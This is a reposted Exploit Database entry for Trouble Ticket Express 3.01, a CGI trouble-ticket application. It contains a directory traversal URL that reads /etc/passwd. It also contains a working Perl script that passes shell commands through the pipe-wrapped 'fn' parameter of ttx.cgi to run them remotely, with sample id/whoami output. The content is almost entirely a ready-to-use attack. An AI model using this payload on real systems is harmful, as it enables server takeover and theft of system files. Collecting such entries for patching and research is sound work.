Trouble Ticket Express 3.01 – Remote Code Execution / Directory Traversal

• Exploit Database
• 115 阅读

• 作者： zombiefx
  日期： 2010-03-14
• 类别：

  • webapps
  平台：

  • cgi
• 来源：https://www.exploit-db.com/exploits/11723/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29

  # Exploit Title: Trouble Ticket Express Remote Code Execution/Directory Traversal # Author: zombiefx <darkernet@gmail.com<mailto:darkernet@gmail.com>> # Software Link: http://www.troubleticketexpress.com/download/ttx301.zip # Version: v3.01,v3.0,v2.24,v2.21 # Tested on: Linux # CVE : # Code:   # This is only possible if an attachment input is available. # Directory Traversal Vuln is # http://localhost/cgi-bin/ttx.cgi?cmd=file&fn=../../../../../../etc/passwd # Simple perl code to run commands on the box # $ id # uid=0(httpd) gid=0(httpd) groups=0(httpd) # $ whoami # httpd   #!/usr/bin/perl use warnings; use strict; use LWP::Simple; my $url = &apos;http://localhost/cgi-bin/ttx.cgi&apos;; print &apos;$ &apos;; while (<>) { print get( $url . &apos;?cmd=file&fn=|&apos; . $_ . &apos;|&apos; ); print &apos;$ &apos;; } <mailto:darkernet@gmail.com>